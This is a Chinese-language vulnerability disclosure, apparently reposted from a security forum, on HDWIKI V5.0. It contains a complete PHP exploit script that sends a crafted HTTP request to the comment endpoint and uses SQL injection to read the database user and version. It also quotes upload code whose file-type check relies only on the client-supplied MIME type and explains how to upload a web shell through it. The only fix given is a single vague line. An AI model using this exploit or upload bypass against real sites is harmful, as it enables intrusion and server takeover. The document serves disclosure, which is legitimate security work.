HDWIKI V5.0多个sql注入漏洞/可执行文件上传漏洞及

HDWIKI V5.0 基本上没有对输入的变量进行过滤,存在多个sql注入漏洞

贴一个发表评论的地方的注入代码

<?php error_reporting(7); ini_set('max_execution_time', 0);

$host = $argv[1]; $path = $argv[2]; $POSTDATA='comment=ddddddddddddd&c_class=0&re_id=0&anonymity=0&code=undefined';

echo $html = send($POSTDATA);

function send($cmd) {     global $host,$path;     $message = "POST $path/index.php?comment-add-2,(select/**/concat(user(),0x5f,version())),1,1,1,1),(1 HTTP/1.1\r\n";     $message .= "Accept: */*\r\n";     $message .= "Referer: ".$host."\r\n";     $message .= "Accept-Language: zh-cn\r\n";     $message .= "Content-Type: application/x-www-form-urlencoded\r\n";     $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";     $message .= "Host: ".$host."\r\n";     $message .= "Content-Length: ".strlen($cmd)."\r\n";     $message .= "Connection: Close\r\n";     $message .= "Cookie: kaiyuan_tip_date=2%2C11; hd_sid=OBIyML; hd_auth=768anzIskveAg6VFdx6L41XBHI%2Be0Xofs%2BfBr4E%2Fj7Wh%2BEkYJRzFdHzMp4uMwA6IqIVhfWwR6CD267coIdhV\r\n\r\n";     $message .= $cmd;

    $fp = fsockopen($host, 80);     fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))         $resp .= fread($fp, 1024);

    return $resp; }可执行文件上传漏洞

attachement.php 上传文件的代码

function douploadimg() {         $imgname=$_FILES['photofile']['name'];         $extname=file::extname($imgname);         $destfile=$_ENV['attachment']->makepath($extname);         $arrupload=file::uploadfile($_FILES['photofile'],$destfile);         ……涉及的几个函数

function extname($filename){         $pathinfo=pathinfo($filename);         return strtolower($pathinfo['extension']);     }

function makepath($extname,$format='Ym'){         return 'uploads/'.gmdate($format, $this->base->time + $this->base->setting['time_offset'])."/{$this->base->time}".util::random(8).'.'.strtolower($extname);     }

function uploadfile($attachment,$target,$maxsize=1024,$is_image=1){         $result=array ('result'=>false,'msg'=>'upload mistake');         if($is_image){             $attach=$attachment;             $filesize=$attach['size']/1024;             if(0==$filesize){                 $result['msg'] = '&#19978;&#20256;&#38169;&#35823;';                 return $result;             }             if(substr($attach['type'],0,6)!='image/'){//仅仅依靠type来判断文件类型                 $result['msg'] ='&#26684;&#24335;&#38169;&#35823;';                 return $result;             }             if($filesize>$maxsize){                 $result['msg'] ='&#25991;&#20214;&#36807;&#22823;';                 return $result;             }         }else{             $attach['tmp_name']=$attachment;         }         $filedir=dirname($target);         file::forcemkdir($filedir);         if(@copy($attach['tmp_name'],$target) || @move_uploaded_file($attach['tmp_name'],$target)){             $result['result']=true;             $result['msg'] ='&#19978;&#20256;&#25104;&#21151;';         }         ……     }

传过了以后,在图片百科中可以看到shell地址 摘自http://bbs.wolvez.org/viewtopic.php?id=208 HdhCmsTest2cto测试数据 提供修复： 针对上述问题代码过滤

查看更多关于HDWIKI V5.0多个sql注入漏洞/可执行文件上传漏洞及的详细内容...